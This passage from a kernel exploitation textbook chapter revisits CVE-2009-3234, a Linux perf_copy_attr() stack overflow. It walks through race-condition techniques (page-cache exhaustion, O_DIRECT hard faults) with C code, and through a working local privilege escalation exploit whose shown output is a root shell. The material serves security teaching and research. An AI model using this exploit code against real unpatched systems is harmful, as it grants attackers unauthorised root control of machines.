Revisiting CVE-2009-3234

In the previous section, “Exploiting Linux Kernel Stack Buffer Overflows,” we introduced the perf_copy_attr() vulnerability and we exploited it using the pointer arithmetic issue along with the stack overflow. Let's now imagine that the code doing the pointer arithmetic was actually correct. Would we still be able to exploit the vulnerability? Let's check the code again:

for (; addr < end; addr += sizeof(unsigned long)) {

ret = get_user(val, addr); [1]

if (ret)

return ret;

if (val) [2]

goto err_size;

}

}

[…]

ret = copy_from_user(attr, uattr, size); [3]

Standing at the check [2], we would still be able to overwrite the stack with a given number of 0s, but, as we already saw, this would make the vulnerability dependent on our ability to map the NULL (0x0) page in the user address space; a privilege that is less and less common in today's operating systems. Looking at the code more closely, we see that it accesses the user-land data twice: once in the get_user() [1] loop and once at the end via copy_from_user(). If this code would execute alone and without being interrupted it would be safe, since no user-land process would have a chance of modifying the contents on the page between the get_user() loops and the final copy_from_user(). Unfortunately, both of these assumptions are wrong.

First, on an SMP system, each CPU executes independently from the others. While one CPU is busy with this kernel path, another one could be executing a user-land thread that simply modifies the buffer contents. A malicious program could create two threads and a zero-filled buffer, make one thread pass the buffer to the perf_copy_attr() function, and with a little timing, make the second thread modify the contents after they have been validated. The trick here would be to bind the two threads to two different CPUs and raise their priority as much as possible, making the second one wait a little bit before changing the contents. On a low-load machine, this would have a nearly 100 percent chance of success (with the synchronization among threads being the only issue).

As usual, though, let's not stop with the low-hanging fruit. Reliable exploitation on UP systems would be nice too. On UP systems there is no chance of having two different code paths running at the same time and, as we learned in Chapter 3 our only chance is to force the kernel path to be scheduled off the CPU and our user-land thread to be picked up for execution. The trick here is to make the kernel go through the slow path of accessing the disk as a consequence of a page fault.

Let's take a step back. Linux (along with nearly all other modern operating systems) makes extensive use of demand paging. Each time a new memory mapping is inserted in the virtual address space of a process, the OS only marks the range as valid but does not populate the page tables with the corresponding entries. Once the process accesses the memory range a page fault is raised and the page fault handler is responsible for creating the correct entries. The page fault handler behavior in this case can be roughly summarized in a few simple steps:

  • Check if the requested access is valid (the address is in the process address space and there is no permission violation).

  • Look for the requested page in memory. The kernel keeps a cache, known as the page cache, of the physical pages currently in memory (pages frequently/recently accessed, pages recently freed), to avoid going back to the disk for frequently accessed frames. As an example, think of the text of the libc library. Nearly each spawned process on the system needs to access it and thus it is considered good optimization to have it cached. The page cache is divided into the active cache (pages that are in the page tables of at least one process) and the inactive cache (pages that are unreferenced and were just recently released, since there is a good chance that they might be reaccessed; for example, think of how many times you execute an editor, close it, and then remember an extra change you wanted to make), and usually grows to use a good portion of the available RAM, due to the performance gain that it gives (saving accesses to the disk).

  • If the page is found in the page cache, make the page table entry point to it and return. The page fault is called, in this case, a soft fault. Rescheduling is unlikely to happen.

  • The page is not in the page cache, which means it is on the disk (either it has been swapped out or it is the first time it is accessed). The page fault handler starts an I/O transfer from disk to memory and puts the process to sleep. The scheduler picks a new process to execute. Once the I/O transfer is done, the faulting process is awakened and the page table entry is populated, pointing to the memory page where the disk contents have been copied. This kind of page fault is called a hard fault and is the kind of situation we want to generate to exploit the race condition on UP (and further improve our chances on SMP).

Triggering a hard page fault is not complicated per se; it is enough to create a new mapping for a never referenced file and make the kernel path access it. The problem, generally, is that we want some controlled contents in the file (e.g., to bypass the checks in the perf_copy_attr() example) and, to achieve that, we need to access it ourselves earlier to write into it. At that point, the file pages will enter the page cache and a subsequent access by the kernel would generate only a soft fault. This is not enough for a reliable exploit and we need to find a solution.

Exhausting the Page Cache for Fun and Profit

The first, traditional solution to the problem comes from a simple observation: the page cache code needs to remove unreferenced or recently unused pages to make room for newly requested ones. This is pretty much mandatory for the correct functioning of the system. The good news is that we can take advantage of this property to force our page out of the page cache after we have written to it and before using it inside our exploit.

The idea is pretty simple and is the most classic of the exhausting/brute forcing approaches. Allocate tons of pages until the page cache is full and inactive pages start to be evicted. cache_out_buffer() (shown below) exactly implements this technique to return a pointer to a buffer that has been evicted from the page cache. As usual, the full code (linux_race_eater.c) is available online at www .attackingthecore.com. The function is as follows:

void* cache_out_buffer(void *original, size_t size, size_t maxmem)

{

int fd;

size_t round_size = (size + PAGE_SIZE) & ~(PAGE_SIZE -1);

size_t round_maxmem = (maxmem + PAGE_SIZE) & ~(PAGE_SIZE -1);

unlink(FILEMAP);

unlink(FILECACHE);

fd = open(FILEMAP, O_RDWR | O_CREAT, S_IRWXU);

if(fd < 0)

return NULL;

write(fd, original, size);

close(fd);

if(fill_cache(round_maxmem) == 0)

return NULL;

fd = open(FILEMAP, O_RDWR | O_CREAT, S_IRWXU);

if(fd < 0)

return NULL;

return mmap_file(fd, round_size);

}

This function takes, as parameters, the target buffer and the size of it, and uses these values to dump the buffer content into a file. This operation brings the “buffer” contents - now contained within the freshly created file – into the page cache. At this point we need to generate pressure on the page cache. There are a variety of ways to achieve that (basically, any form of extensive disk accessing would work, even commands such as find /usr –name “*” | xargs md5sum may do the trick on some systems), but the one we have decided to use here is based on generating a large (mostly empty) file on the disk and then accessing its “contents” page by page. The fill_cache() function shown below does exactly this.

int fill_cache(size_t size)

{

int i,fd;

char *page;

fd = open(FILECACHE, O_RDWR | O_CREAT, S_IRWXU);

if(fd < 0)

return 0;

lseek(fd, size, SEEK_SET);

write(fd, "", 1); [1]

page = mmap_file(fd, size); [2]

if(page == NULL)

{

close(fd);

return 0;

}

for(i=0; i<size; i+=PAGE_SIZE)

{

*(page + i) = 0x41;

if((i % 0x1000000) == 0 && debug)

system("cat /proc/meminfo | grep '[Ai].*ve'"); [3]

}

munmap(page, size);

close(fd);

return 1;

}

At [1], we write a byte into the new file at a high offset specified by the size parameter (e.g., 0x40000000, 1GB). This operation creates a virtually large 1GB file which, since modern filesystems support file holes, takes up only a single disk block. Right after [2], we map the file with MAP_PRIVATE and we start looping through it, hitting a page at a time, and thus driving the allocation/commit of a page inside the active cache at each iteration. If debug is enabled the code also prints the active and inactive system caches [3]. We can monitor the effect of our code looking at the output of the /proc/meminfo file. Here is an excerpt:

linuxbox$ cat /proc/meminfo

[…]

MemTotal: 1019556 kB

MemFree: 590844 kB

Buffers: 7620 kB

Cached: 267292 kB

SwapCached: 50904 kB

Active: 18364 kB

Inactive: 335036 kB

Active(anon): 10444 kB

Inactive(anon): 70592 kB

Active(file): 7920 kB

Inactive(file): 264444 kB

If we keep dumping this file while our exhausting code continues, we will see the Inactive entry shrink while the Active entry grows (as a consequence of our loop).

linuxbox$ cat /proc/meminfo

[…]

Active: 247000 kB

Inactive: 106400 kB

[…]

Eventually, our page will be evicted and we will be ready to map it again inside our exploit and use it to trigger the hard fault. This time, though, the file will have the desired payload inside.

Although this approach generally works, it can be very slow on a new system with tons of RAM and might not be entirely reliable (e.g., if the process/user is allowed to commit only a certain amount of physical memory). If the operating system allows us to lock down a certain amount of physical RAM, we can improve our chances of success. As such, it will be like playing the game on a system equipped with less RAM.

Tip

On OpenSolaris, for example, we can use the now deprecated Intimate Shared Memory (ISM) to achieve this goal. Pages shared through this mechanism are automatically locked down in memory. ISM pages can be created passing the SHM_SHARE_MMU flag to shmat(). The use of ISM is now generally deprecated in favor of Dynamic Intimate Shared Memory (where pages need to be explicitly locked down via the privileged mlock()), but is still available.

Still, even with some locked-memory trick, this approach is suboptimal. Therefore, here is a technique that works on nearly all modern operating systems and allows us to obtain the same result in a simpler and 100 percent reliable manner: the Direct I/O technique.

The Direct I/O Technique

The problem with the traditional approach is that once the page enters the page cache we have a hard time getting it evicted. The Direct I/O technique solves this problem by preventing the page from entering the page cache in the first place, but still allowing us to change its contents! At this point, the first access will be the one from kernel land and will correctly trigger a hard fault.

Let's look at the (Linux) manpage for open():

O_DIRECT

Try to minimize cache effects of the I/O to and from this file. In general this will degrade performance, but it is useful in special situations, such as when applications do their own caching. File I/O is done directly to/from user space buffers. The I/O is synchronous, i.e., at the completion of a read(2) or write(2), data is guaranteed to have been transferred.

Whenever a file is opened with the O_DIRECT flag, read() and write() operations bypass (and thus, don't fill) the page cache,QQ allowing us to write our payload inside a file without having the pages stored in the cache. The good news is that, as we said, we can forget that long, tedious, and not totally reliable process of exhausting the inactive cache. Needless to say, we are going to use this technique to exploit the perf_copy_attr() race condition, but here we will demonstrate it through a simple proof of concept. You can find the complete code (o_direct_race.c) online at www.attackingthecore.com. Let's look at the key part of it.

volatile int check,s_check,racer=0;

[…]

int main(int argc, char *argv[])

{

[…]

fd_odirect = open(argv[1], O_RDWR|O_DIRECT|O_CREAT, S_IRWXU); [1]

fd_common = open(argv[1], O_RDWR|O_CREAT, S_IRWXU); [2]

write(fd_odirect, align_data, 1024); [3]

addr = mmap_file(fd_common, 1024); [4]

start_thread(racer_thread, NULL); [5]

racer = check = 0;

tsc_1 = __rtdsc();

s_check=check;

racer=1; [6]

uname((struct utsname *)addr); [7]

tsc_2 = __rtdsc();

if(check != s_check)

printf("[**] check Changed Across uname() before=%d, after=%d ",

s_check,check);

else

printf("[!!] check unchanged: Race Failed ");

printf("[**] syscall accessing "racer buffer": TSC diff: %ld ",

tsc_2 – tsc_1);

}

static int racer_thread(void *useless) [8]

{

while(!racer);

check=1;

}

At [1] and [2], the code creates and opens a new file twice. The first open() uses the O_DIRECT flag while the second one avoids it. The net result is that we can now access the same file using two different file descriptors. We call the first one “Direct I/O descriptor” and the second one “traditional descriptor.”

At [3], the function calls the write() system call to write data into the file using the I/O direct descriptor, thus bypassing the page cache entirely. Later, at [4], the function maps the file in memory using the traditional descriptor and starts the racing thread. The code of the racing thread, launched at [5], is shown at [8] and is pretty simple. It just tries to change the value of the check variable. If you look at the code, the racer thread will not attempt to perform the change until the racer variable is set to a nonzero value, which is what the main thread does at [6], right before calling the uname() system call at [7]. Right before and right after this call, the TSC (time stamp counter) is checked to see how much time passed between the two calls.

Once uname() returns, we check the value of check to see if the race effectively happened, and if so, how long it took before the syscall terminated. This will give us a perfect base for future exploits: racer_thread() will be replaced by our “updating” thread and uname() by a call to the vulnerable kernel path. Let's run the code on a UP machine. Since only one process can run at a time, if the value of check has changed when we come back that means we won the race condition. The TSC diff will give us further hints regarding how much “time” we have to play our racing games.

linuxbox$ ./o_direct_race ./test.txt

[**] Executing Write Through O_DIRECT…

[**] O_DIRECT sync write() TSC diff: 72692549 [1]

[**] Starting Racer Thread …

[**] Value Changed Across uname() (passing “racer buffer”) b=0, a=1

[**] syscall accessing "racer buffer": TSC diff: 37831933 [2]

The Direct I/O write, as we can see at [1], takes quite some time. It is likely that a rescheduling occurred while we were waiting for the I/O to the disk to complete. This is good news: the implementation is correct (synchronous) and does not return until the data is on the disk. At [2], we see that our race with uname() succeeded and that we have to thank a hard page fault for that. The diff time is long enough, suggesting an access to disk.

Exploiting CVE-2009-3234 on UP the I/O Direct Way

The key point of this technique is that it is applicable to nearly all modern operating systemsRR (RDBMSes run everywhere…), so let's just see an example of it in action with the perf_copy_attr() vulnerability. To successfully apply the technique we need to take care of a few details while writing the exploit:

  • The buffer on which we plan to race needs to be big enough to trigger the overflow and trash a few more bytes after the return address.

  • We need to divide the buffer into two adjacent memory mappings:

    • An anonymous mapping that spans most of the “buffer” filled with zeros

    • A final extra chunk mapping a file from the disk and filling it with zeros using the Direct I/O technique

Figure 4.8 should help us to visualize this two-part buffer.

Image

Figure 4.8 Two-part buffer for the perf_copy_attr() race condition.

The reason for this layout is to successfully pass the sequence of post get_user() checks (check if the copied value is 0) and then trigger a hard fault during the last one. At this point, our user-land thread should be rescheduled and have a chance to modify the anonymous mapping with the exploitation payload before copy_from_user() accesses it. Once again, we are going to see only the key functions of the exploit here; for the full exploit (CVE-2009-3234-iodirect.c) point your browser to www.attackingthecore.com.

static long _page_size;

static unsigned long prepare_mapping(const char* filestr)

{

int fd,fd_odirect;

char *anon_map, *private_map;

unsigned long *val;

fd_odirect = open(filestr, [1]

O_RDWR|O_DIRECT|O_CREAT, S_IRUSR|S_IWUSR);

anon_map = mmap(NULL, _page_size,

PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0); [2]

memset(anon_map, 0x00, _page_size);

val = (unsigned long *)anon_map;

write(fd_odirect, val, _page_size)

fd = open(filestr, O_RDWR); [3]

private_map = mmap(anon_map + _page_size, [4]

_page_size, PROT_READ|PROT_WRITE,

MAP_PRIVATE|MAP_FIXED, fd, 0);

return (unsigned long)private_map;

}

In the preceding code, prepare_mapping() is responsible for creating the two-part buffer as described earlier, and is the key function of the preparatory phase of this exploit. To compact the output, we have removed the error return checks from the various syscalls, but they are available in the online copy. Never underestimate the importance of making the exploiting code defensive. At [1], the function creates and opens the file for the last chunk in O_DIRECT mode, and at [2], it creates the anonymous mapping for the first part of the buffer. The created anonymous mapping is used to fill the file with zeros via direct I/O, and the file is then reopened at [3] to create a mapping right after the previous one at [4]. At this point, we are ready to trigger the vulnerability.

static volatile int racer=0;

static int racer_thread(void *buff)

{

unsigned long *p_addr = buff;

int total = (BUF_SIZE - sizeof(unsigned long))

/ sizeof(unsigned long);

int i = 0;

while(!racer); [5]

check=1;

for(i = 0; i < total; i++)[6]

*(p_addr + i) = (unsigned long)kernel_payload;

return 0;

}

You should recognize our good friend the racer_thread() here. Here it waits for the kickstart variable to change [5], and then copies [6] the address of the exploitation payload (the one we saw in the stack-based example) into the buffer passed as an argument. As you can imagine, this address will be the one created by prepare_mapping(), as the following function shows:

#define MAP_FILE_NAME "./perfcount_bof_race"

int main(int argc, char *argv[])

{

[…]

racer_buffer = prepare_mapping(MAP_FILE_NAME);

perf_addr = racer_buffer - BUF_SIZE + [7]

sizeof(unsigned long)*POINTER_OFF

- sizeof(struct perf_counter_attr);

ctr = (struct perf_counter_attr *)(perf_addr);

start_thread(racer_thread, [8]

(void*)(perf_count_struct_addr

+ sizeof(struct perf_counter_attr)));

sleep(1);

ctr->size = BUF_SIZE;

ctr->type = 0xFFFFFFFFUL;

racer=1; [9]

syscall(__NR_perf_counter_open, ctr, getpid(), 0, 0, 0UL);

[…]

}

First, the racer_buffer is created via prepare_mapping(). The semi-magic calculation at [7] is to make sure the stack overflow reaches the saved instruction pointer and overwrites a few bytes after (contained inside the Direct I/O updated file). At [8], we create the racer thread, and at [9], we switch the flag on which it waits (racer), right before triggering the issue invoking the perf_counter_open() system call. The rest of the exploit (basically the stack-recovery and privilege-escalating payload) is the same as the code presented in the stack exploitation section, and so is the outcome once executed: a root shell.

linuxbox$ ./exp_perfcount_race

[**] commit_cred=0x0xffffffff81076570

[**] prepare_kernel_cred=0x0xffffffff81076780

[**] Anonymous Map: 0x7f2df3596000, File Map: 0x7f2df3597000

[**] perfcount struct addr: 0x7f2df3596f40

[**] Triggering the Overflow replacing the user buffer…

# id

uid=0(root) gid=0(root)

#

It is worth pointing out, once more, that the main vulnerability we exploited here is not strictly related to the race condition, but exploiting the condition gave us a chance to bypass a common safeguard against mapping NULL page protection.

Summary

After a lot of theory, it was definitely time for some practice. In this chapter, we covered the UNIX family, focusing on two of its members: Linux (mostly) and (Open)Solaris. After introducing the target operating systems and the debugging facilities available on each of them, we started our analysis of the steps presented in Chapter 3.

First we covered the execution step, where we discussed the development of a privilege-raising shellcode for the Linux operating system. The Linux case was particularly interesting because it gave us the opportunity to explore the two common ways for UNIX systems to associate privilege information to the process control block (a static structure member or a function pointer to a dedicated structure), and to introduce the concept of more fine-grained permissions (Linux capabilities). In this section, we improved our payload, getting rid of static values and magic numbers in favor of “runtime deducted” values. As a general rule, the less we depend on static or precompiled information, the more our shellcode will be portable among different releases of the same operating system and the better it will adapt to different configurations.

Abiding by our goal of analyzing methodologies rather than just premade code, we spent some time learning how to “discover” the building blocks of our shellcode by traversing various kernel functions and structures. The suggested approach involves starting from a system call that retrieves (or manipulates) privileges (in our case, getuid()) and following its implementation as a “guide” to develop our payload. Following this approach, you should be able to quickly piece together a working payload for any target operating system/implementation.

Equipped with a fully working shellcode, we moved on to analyze the various bug classes, covering the triggering step of each of them. As we said, our main focus was on the Linux operating system, especially because it offers a set of public, real (as opposed to “crafted”) vulnerabilities to play with. The set_selection() and perf_copy_attr() issues were our choice for SLUB, stack, and race condition examples.

Along with the Linux SLUB, we also covered the (Open)Solaris slab allocator implementation—this time with a crafted example, taking the opportunity to analyze in detail a different environment and look at the system that introduced the concept of a slab allocator. In the process, we applied what we learned about the kernel debugger and developed a proper shellcode for the (Open)Solaris system.

As we learned, triggering a vulnerability usually leaves the kernel in some inconsistent state, which could generate a crash/panic of the target system, making our exploitation efforts vane. To prevent this, our exploit/payload needs to carefully reset the trashed structures/kernel objects to keep the state stable. We looked at two approaches in this regard. For a small recovery, we just have our shellcode do the work; for a large/complex recovery, we need to try to keep things “stable enough” until we can load a dedicated kernel module to restore the problematic structures.

This chapter on Linux was only the first of our practical operating system chapters. Our analysis continues, first with Mac OS X (Chapter 5) and then with Windows (Chapter 6).

Endnotes

1. Keninston J, Panchamukih PS, Hiramatasu M. Kernel probes (KProbes), http://www.kernel.org/doc/Documentation/kprobes.txt.

2. Rubini A, Corbet J. Linux Device Drivers, 2nd ed., 2001, O'Reilly Media, Inc.

3. CVE-2009-1046, set_selection() memory corruption, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1046; 2009.

A In this case, it is one of our test boxes, so the high number of recompilations is not surprising.

B For example, at the time of this writing, Debian 4.0 (Etch) is still using either the 2.6.18 or 2.6.24 derived kernel; the Debian 5.0 (Lenny) kernel is derived from the 2.6.27 stable branch, Ubuntu 6.06 is based on a 2.6.15 kernel, and Ubuntu 8.10 is again based on the 2.6.27 branch.

C A good example is the kernel “heap” allocator. At the time of this writing, a few distributions still use the old SLAB allocator, while the majority ship with the SLUB allocator by default.

D Although here we focus on distinguishing kernels based on the uname -a output (which is generally a good way), different subsystems may also be identified through what they “export” to user land. We will see this on a case-by-case basis through the rest of the chapter.

E This convention is also generally followed by nondistribution patches. For example, a grsecurity patched kernel will show up as –grsec (e.g., 2.6.25.10–grsec).

F Both KDB and KGDB have, for long time, been external patches.

G In this case, we use the term kprobes to refer to the base framework.

H This is necessary to restore the correct stack and registers for the original function and is due to the way jprobes are implemented. Interested readers can find more details about the implementation of the kprobes framework in the aforementioned Documentation/kprobes.txt file.

I http://kerneltrap.org/Linux/Kgdb_Light

J OpenSolaris.org General FAQs, http://hub.opensolaris.org/bin/view/Main/general_faq#opensolaris-solaris.

K Solaris Dynamic Tracing Guide, http://docs.sun.com/app/docs/doc/817-6223.

L Dynamic Instrumentation of Production Systems, Bryan M. Cantrill, Michael W. Shapiro, and Adam H. Leventhal, www.sun.com/bigadmin/content/dtrace/dtrace_usenix.pdf.

M McDougall M., Mauro J., and Gregg B. 2006. Solaris(TM) Performance and Tools: DTrace and MDB Techniques for Solaris 10 and Open Solaris. Prentice Hall PTR.

N At the time of this writing, the DTrace framework supports a handful of providers and around 80,000 probes.

O The binary driver needs to be nonobfuscated and, among all, compiled using the frame pointer (the FBT provider uses the frame-pointer-related instructions in the prologue as a signature). A large part of the NVIDIA driver is not “dtraceable” for this reason.

P Solaris Modular Debugger Guide, http://docs.sun.com/app/docs/doc/817-2543.

Q McKusick, M. K., Bostic, K., Karels, M. J., and Quarterman, J. S. 1996. The Design and Implementation of the 4.4BSD Operating System. Addison Wesley Longman Publishing Co., Inc.

R More precisely, 4.4 BSD-lite Release 2 is the last release and development of the OS has ceased.

S We do not show examples from other kernels, but at the time of this writing this is true for any 2.6 kernel version.

T http://www.grsecurity.net/~spender/enlightenment.tgz.

U “Attacking the Core: Kernel Exploitation Notes,” twiz and sgrakkyu, PHRACK 64, www.phrack.org/issues.html?issue=64&id=6#article.

V “Exploiting UMA, FreeBSD's kernel memory allocator,” argp and karl, www.phrack.org/issues.html?issue=66&id=8#article.

W CVE-2009-1046 set_selection() memory corruption, http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1046.

X Bonwick, J. 1994. “The slab allocator: an object-caching kernel memory allocator.” In Proceedings of the USENIX Summer 1994 Technical Conference on USENIX Summer 1994 Technical Conference - Volume 1 (Boston, June 6–10, 1994). USENIX Association, Berkeley, CA.

Y Bonwick, J. and Adams, J. 2001. “Magazines and vmem: extending the slab allocator to many CPUs and arbitrary resources.” In Proceedings of the General Track: 2002 USENIX Annual Technical Conference (June 25–30, 2001). Y. Park, Ed. USENIX Association, Berkeley, CA, 15–33.

Z The “previous” magazine at the CPU layer is an optimization to this approach. Since it will always be either full or empty, it is kept there and swapped with the current one in case it could fulfill the request. The current OpenSolaris implementation keeps three magazines at the CPU layer: a full one, an empty one, and a partially used (current) one.

AA If you're interested, creation of the various general-purpose caches occurs inside kmem_cache_init(), which calls kmem_alloc_caches_create().

BB In other words, when searching for vulnerabilities, it is common to hunt for kmem_alloc() (and its zeroing-content counterpart, kmem_zalloc()) calling paths.

CC Further details on compiling and installing the driver, along with the full source code, are available at www.attackingthecore.com.

DD Nonsanitized parameters used inside an ioctl() call are an extremely common case for kernel vulnerabilities.

EE Well, we actually could do it, but we would need the list of allocations and frees from boot time.

FF It's a dummy test module; no need to be picky here!

GG truss is a program that can track the system calls (with arguments and return values) executed by a program.

HH If that sounds cryptic, do not worry. Shortly, we will see our theory in practice with a few memory dumps that will, hopefully, make things clear.

II As usual, the full code is available at www.attackingthecore.com.

JJ Throughout this section, we use the term SLAB in uppercase to refer to the first Linux allocator, while we use the term slab in lowercase to generically refer to a series of contiguous physical pages that the allocator creates to manage a group of objects of the same size. The term slab thus applies to any of the allocators described in this section.

KK Larry H, “Linux Kernel Heap Tampering Detection,” PHRACK 66, www.phrack.org/issues.html?issue=66&id=15#article.

LL Christoph Lameter, “SLUB: The unqueued slab allocator V6,” http://lwn.net/Articles/229096/.

MM Note: 32 by 128 is 4,096, which reflects the typical size of one page frame. The reason 128 32-byte wide objects are available is that no extra metadata information needs to be kept in the slab.

NN Where “current” means, at the time of this writing, Linux versions earlier than 2.6.30. The offset at which the metadata is stored is tracked inside the page struct and may change in future releases.

OO kmem_cache_free() omits the check for a debatable optimization choice. The slab cache the object belongs to is passed as a parameter to kmem_cache_free(), so it is not necessary to derive it from the page structure (page->slab).

PP In the tiocl_houdini.c code this is implemented mostly by the start_listener() (server part) and the create_and_init() and connect_peer() (client part) functions.

QQ If you never had a chance to be thankful for database implementations, now is your chance. Big RDBMSes with their own cache optimization are the primary reason for the existence of this flag.

RR In fact, we will encounter this technique again in Chapter 6.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset